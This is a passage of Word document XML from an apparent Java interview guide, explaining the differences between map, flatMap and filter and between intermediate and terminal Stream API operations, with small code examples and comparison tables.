          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w14:paraId="74FF54B9" w14:textId="025BED82"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Stream API, map and flatMap are both intermediate operations that transform data, but they are used in different contexts and behave differently. Here’s the detailed difference between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02622643"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A627EEE"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map is used to transform each element of the stream into another form. It applies a function to each element of the stream and returns a new stream of the transformed values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC38D7"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stream of values that are the results of applying the given function to each element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D92C6"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1, i.e., each input element produces exactly one output element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4783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7845B2D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4EAFDE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squaredNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A92D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480A78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6A813A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2906C230"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ach number is squared individually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03548116"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latMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8CDB5"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flatMap is used to transform each element into a stream of new elements, and then it "flattens" all those streams into a single stream. This means that instead of returning a stream of values, it returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream of streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is then flattened into a single stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2872C0"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xml:space="preserve">: It produces a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single flattened stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by flattening the results of applying the function to each element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6D9A2"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many, i.e., each input element can produce zero or more output elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E980A4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latMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFD56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Integer&gt;&gt; listOfLists = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053AE1C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1, 2, 3),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF477D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4, 5, 6),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A57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7, 8, 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA045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894102" w14:textId="77777777" w:rsidR="008546D9" w:rsidRPr="00CE4B95" w:rsidRDefault="008546D9" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548FB5C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flattenedList = listOfLists.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283D7B2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59AA0A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B6EB01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lattenedList);  // Output: [1, 2, 3, 4, 5, 6, 7, 8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067832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latMap takes each list inside the list of lists and flattens them into a single list of integers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2067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927"/>
        <w:gridCol w:w="4467"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="4E9F7E06" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C30B4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397177E"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766CFFD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atMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="65D45D46" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57B2788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ation Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74C6D6C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One (single element per input)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B2A037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Many (multiple elements or none per input)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="320BF807" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F0B2D3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0AD3125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of transformed values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E74632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ed Stream of values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3DE6F9C3" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1036F4D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275CB7B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one output element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0019B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zero or more output elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="4D2C8036" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610892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20F63C9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a string to uppercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21802C3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ing a list of lists into a single list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F3F6FBC"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FAE4A26"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ap** when you want to transform each element into another form or type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F7F40"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 the transformation results in multiple values per input element, and you want to flatten them into a single stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59955642" w14:textId="153AFB9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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C205FA" w14:textId="77777777" w:rsidR="00091087" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="005C4D73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Toc197867450"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Map and Filter in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="294980DF" w14:textId="38D09FA9"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8 Stream API, map and filter are two different intermediate operations, and they serve different purposes. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1B14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45B7E20"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map function is used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transforming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements in the stream. It takes each element of the stream and applies a transformation (via a function), producing a new stream of transformed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450254B9"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where each element is the result of applying the given function to the corresponding element in the original stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05791D28"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map is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1-to-1 transformation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning each element in the original stream is mapped to exactly one element in the new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12603E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114BA75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1E5ECC4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35D0AC2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169D3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3EA567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quaredNumbers);  // Output: [1, 4, 9, 16, 25]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003B2B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map squares each element of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB61F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ter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919C12E"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filter function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the stream that satisfy a given condition (predicate). It keeps the elements that pass the filter condition and removes those that do not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14ECD3"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that contains only the elements that satisfy the predicate condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE140C"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filter is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1-to-0 (or 1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transformation, meaning each element either passes the condition and is retained in the new stream, or is filtered out (i.e., not included in the new stream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E3EF72"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ilter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4065AF2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7FD0A4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evenNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F94C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67BEB2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F98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venNumbers);  // Output: [2, 4, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189E20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ilter selects only the even numbers from the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B1693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3664"/>
        <w:gridCol w:w="5202"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="1F360202" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E1DEC59"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00E0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55BF192F"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lter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="41103876" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75F7C9B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E0233C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each element to another form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7589C3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lects elements based on a condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="61CB95A9" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2652CE6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51C5F0F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transformed elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31BAAEA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elements that pass the condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="5EA3A604" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A394F6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63A9236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element per input element (1-to-1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ABFE43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or one element per input element (1-to-0 or 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="5AC2EB19" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4724C79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 Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6909A10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ation (e.g., changing data, mapping types)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31746E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g., keeping or removing elements based on a condition)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="513F021A" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02C1F4E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5DDEF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transform data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3CE58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remove unwanted elements or filter out based on conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="69CD78FE" w14:textId="77777777" w:rsidTr="008546D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79407BE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9DE52A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each number to its square</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2116267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ven numbers from a list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AA78E1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9034F83"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in the stream into a different form (e.g., converting data types or applying some function to each element).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E4D26"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the stream based on a condition (e.g., keeping only those elements that satisfy a certain predicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A73EE" w14:textId="0464914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693" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78B72F" w14:textId="77777777" w:rsidR="00E34A55" w:rsidRPr="00CE4B95"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37" w:name="_Toc197867451"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the intermediate and terminal operator in Java stream API?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w14:paraId="7242D54B" w14:textId="035973F5"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I</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">n Java Stream API, operations are divided into two categories based on their characteristics: </w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intermediate</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDA5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mediate Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2A75F"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termediate operations are operations that transform a stream into another stream. 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are not executed until a terminal operation is invoked on the stream. They can be chained together, and each intermediate operation returns a new stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B9DC3"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Intermediate operations are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and they do not produce a result themselves; they just modify the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480008CC"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45E5479"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p w14:paraId="71DB820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p w14:paraId="0D18C2E8"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inct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9E8C5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536380A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p w14:paraId="2B4BF551"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ek()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EEC0F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382C7CE"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kip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37E0D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termediate Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B931A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0B2D1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result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DC7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operation (intermediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82B75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map operation (intermediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0E0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3B77EC5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esult);  // Output: [4, 16, 36]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1C45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8C6A43B"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and map are intermediate operations that modify the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77976F15"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is processed step-by-step, but the processing happens only after a terminal operation (collect) is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D6EF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erminal Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5E632"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Terminal operations trigger the processing of the stream and are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 xml:space="preserve"> (i.e., they start the stream pipeline execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D30EE3"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BEEEB1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BD95EB"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p w14:paraId="2F2D1391"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54682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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DA9F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF43B9"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x()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35F0D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Match()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66663443"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Match()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EFD058"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eMatch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018B04A"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First()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FC52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Any()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB1A7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Terminal Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542369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6D8005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 count = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634EE50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intermediate operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B5B3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terminal operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BB0E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unt);  // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08281A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596C77D"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s an intermediate operation that processes the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046FBF6F"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is a terminal operation that computes the number of elements in the filtered stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FC19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573"/>
        <w:gridCol w:w="4088"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="6E27173B" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D81B303"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3BD64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mediate Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B3A75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inal Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="6CDE4574" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB32A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07F76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stream into another stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24EE81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es a result or triggers side effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3126CEBA" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="261B76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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
